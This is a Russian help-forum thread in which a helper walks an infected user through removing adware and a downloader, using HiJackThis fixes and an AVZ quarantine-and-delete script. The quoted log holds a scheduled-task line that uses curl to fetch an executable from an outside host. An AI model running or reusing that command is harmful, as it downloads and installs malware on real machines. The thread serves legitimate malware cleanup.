Здравствуйте, подцепил вирус. После сами по себе стали устанавливаться браузеры mail и комета. Антивирус выдает сurls(Недействительный) за вирус, но удалить его не может. Так же возникают ошибки при запуске самого антивируса
сurls (недействительный).gif
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) melkei, спасибо за обращение на наш форум!
Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Здравствуйте!
1. Скачайте ClearLNK и сохраните архив с утилитой на Рабочем столе.
* Распакуйте архив с утилитой в отдельную папку.
* Перенесите файл Check_Browsers_LNK.log из логов на ClearLNK как показано на рисунке
* Отчет о работе ClearLNK-<Дата>.log будет сохранен в папке LOG.
* Прикрепите этот отчет к своему следующему сообщению.
2. Вы сами устанавливали это ПО?
Если не пользуетесь, - удалите.Код:c:\users\Андрей\appdata\local\vivaldi\application\vivaldi.exe C:\Program Files (x86)\Garena Plus\GarenaMessenger.exe
3. У вас установлено несколько антивирусов, остановитесь на каком-то одном.
360 Total Security
McAfee
Аvast
4. Пофиксите в HiJackThis.
Сама программа HiJackThis находится в папке AutoLogger, в подпапке HiJackThis
5. Временно отключите защитное ПО.Код:R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://mail.ru/cnt/10445?gp=811013 R4 - HKCU\Software\Microsoft\Internet Explorer\SearchScopes: DefaultScope = {FFEBBF0A-C22C-4172-89FF-45215A135AC7} - Поиск@Mail.Ru - http://go.mail.ru/distib/ep/?q={SearchTerms}&product_id=%7BDE952E62-5F2D-4DBD-AAF9-0C747FB0B326%7D&gp=811014 R4 - HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} - Поиск@Mail.Ru - http://go.mail.ru/distib/ep/?q={SearchTerms}&product_id=%7BDE952E62-5F2D-4DBD-AAF9-0C747FB0B326%7D&gp=811014 O2-32 - BHO: MRSearchPlugin - {8E8F97CD-60B5-456F-A201-73065652D099} - C:\Users\Андрей\AppData\Local\Mail.Ru\Sputnik\ie_addon_dll.dll O4 - HKCU\..\RunOnce: [Application Restart #0] C:\Users\Андрей\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --load-extension="C:\Users\Андрей\AppData\Roaming\extensions\extensions_yandex,C:\Users\Андрей\AppData\Roaming\extensions\extension_yandex" --flag-switches-begin --flag-switches-end --disable-client-side-phishing-detection --profile-info --disable-field-trial-config --enable-proprietary-video-hw-decoding --enable-in-process-wmf-demuxer --external-app-null-path --external-app-data=null_data --restore-last-session O4 - HKCU\..\StartupApproved\Run: [GameCenterMailRu] (2017/07/10)C:\Users\Андрей\AppData\Local\Mail.Ru\GameCenter\[email protected] -autostart O4 - HKCU\..\StartupApproved\Run: [amigo] (2016/09/25)C:\Users\Андрей\AppData\Local\Amigo\Application\amigo.exe --no-startup-window (file missing) O4 - HKCU\..\StartupApproved\Run: [ycAutoLaunch_428D6313FFDD39C5CEF69A47F32A9DE0] (2017/07/10)C:\Users\Андрей\AppData\Local\yc\Application\yc.exe /prefetch:5 (file missing) O22 - Task (Ready): FileSystemDriver - C:\Users\Андрей\AppData\Local\FileSystemDriver\FileSystemDriver.exe --stid="14712" (file missing) O22 - Task (Ready): MSI - C:\Users\Андрей\AppData\Roaming\Microsoft\msi.exe cnt=3 fts="dota_2_cheats_patch_7_05_zip\dota_2_cheats_patch_7_05_zip.exe" (file missing) O22 - Task (Ready): SearchGo Task - C:\Users\Андрей\AppData\Local\SearchGo\searchgo.exe (file missing) O22 - Task (Ready): curl - C:\Users\Андрей\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\Андрей\AppData\Roaming\curl\curl.exe" (file missing) O22 - Task (Ready): curls - C:\Users\Андрей\AppData\Roaming\curl\curl.exe (file missing) O23 - Service S3: Mail.Ru Update Service - (mrupdsrv) - C:\Program Files (x86)\Mail.Ru\Update Service\mrupdsrv.exe (file missing)
Выполните скрипт AVZ.
Компьютер перезагрузится.Код:begin QuarantineFile('C:\Users\Андрей\appdata\roaming\svchost.exe',''); QuarantineFile('C:\Users\Андрей\appdata\locallow\searchgo\searchgo.dll',''); QuarantineFile('C:\Users\Андрей\appdata\local\wupdate\wupdate.exe',''); QuarantineFile('C:\Users\Андрей\AppData\Roaming\curl\curl.exe',''); DelCLSID('{0596C850-7BDD-4C9D-AFDF-873BE6890637}'); DelCLSID('{056D528D-CE28-4194-9BA3-BA2E9197FF8C}'); DelCLSID('{05B38830-F4E9-4329-978B-1DD28605D202}'); DelBHO('{2BC46CFA-4B00-4193-A7BD-6AD1D0BCB5BC}'); DelBHO('{598AEFC6-DD3C-4A63-9AC3-53FCF6155931}'); QuarantineFile('C:\Users\Андрей\AppData\Local\MEGAsync\ShellExtX32.dll',''); QuarantineFile('C:\Users\Андрей\AppData\Local\yc\Application\yc.exe',''); DeleteService('mrupdsrv'); StopService('mrupdsrv'); QuarantineFile('C:\Users\Андрей\AppData\Local\NVIDIA\NvBackend\ApplicationOntology\Ontology.dll',''); DeleteFile('C:\Users\Андрей\AppData\Local\NVIDIA\NvBackend\ApplicationOntology\Ontology.dll','32'); DeleteFile('C:\Program Files (x86)\Mail.Ru\Update Service\mrupdsrv.exe','32'); RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','amigo'); DeleteFile('C:\Users\Андрей\AppData\Local\Amigo\Application\amigo.exe','32'); RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','ycAutoLaunch_428D6313FFDD39C5CEF69A47F32A9DE0'); DeleteFile('C:\Users\Андрей\AppData\Local\yc\Application\yc.exe','32'); RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\RunOnce','Application Restart #0'); DeleteDirectory('C:\Users\Андрей\AppData\Roaming\extensions\extension_yandex'); DeleteDirectory('C:\Users\Андрей\AppData\Roaming\extensions'); RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved','{05B38830-F4E9-4329-978B-1DD28605D202}'); DeleteFile('C:\Users\Андрей\AppData\Local\MEGAsync\ShellExtX32.dll','32'); DeleteFileMask('C:\Users\Андрей\AppData\Local\MEGAsync','*',true); DeleteDirectory('C:\Users\Андрей\AppData\Local\MEGAsync'); RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved','{056D528D-CE28-4194-9BA3-BA2E9197FF8C}'); RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved','{0596C850-7BDD-4C9D-AFDF-873BE6890637}'); DeleteFile('C:\Users\Андрей\AppData\LocalLow\SearchGo\searchgo.dll','32'); DeleteFileMask('C:\Users\Андрей\AppData\LocalLow\SearchGo','*',true); DeleteDirectory('C:\Users\Андрей\AppData\LocalLow\SearchGo'); DeleteFile('C:\WINDOWS\system32\Tasks\curls','64'); DeleteFile('C:\Users\Андрей\AppData\Roaming\curl\curl.exe','32'); DeleteFileMask('C:\Users\Андрей\AppData\Roaming\curl','*',true); DeleteDirectory('C:\Users\Андрей\AppData\Roaming\curl'); DeleteFile('C:\Users\Андрей\appdata\local\wupdate\wupdate.exe','32'); DeleteFileMask('C:\Users\Андрей\appdata\local\wupdate','*',true); DeleteDirectory('C:\Users\Андрей\appdata\local\wupdate'); DeleteFile('C:\Users\Андрей\appdata\roaming\svchost.exe','32'); ExecuteSysClean; ExecuteRepair(2); ExecuteRepair(3); ExecuteRepair(4); ExecuteWizard('TSW',2,3,true); ExecuteWizard('SCU',2,2,true); RebootWindows(true); end.
Выполните скрипт AVZ.
6. Пришлите архив карантина из папки AVZ.Код:begin CreateQurantineArchive(GetAVZDirectory +'quarantine.zip'); end.
7. Сделайте новые логи программой Autologger и пришлите их.
8. Сделайте лог утилитой AdwCleaner и пришлите его.
9. Скачайте Farbar Recovery Scan Toolи сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
- Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
- Нажмите кнопку Scan.
- После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
- Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.
Последний раз редактировалось thyrex; 13.07.2017 в 07:27.
Ваши права в разделе
Ответить с цитированием
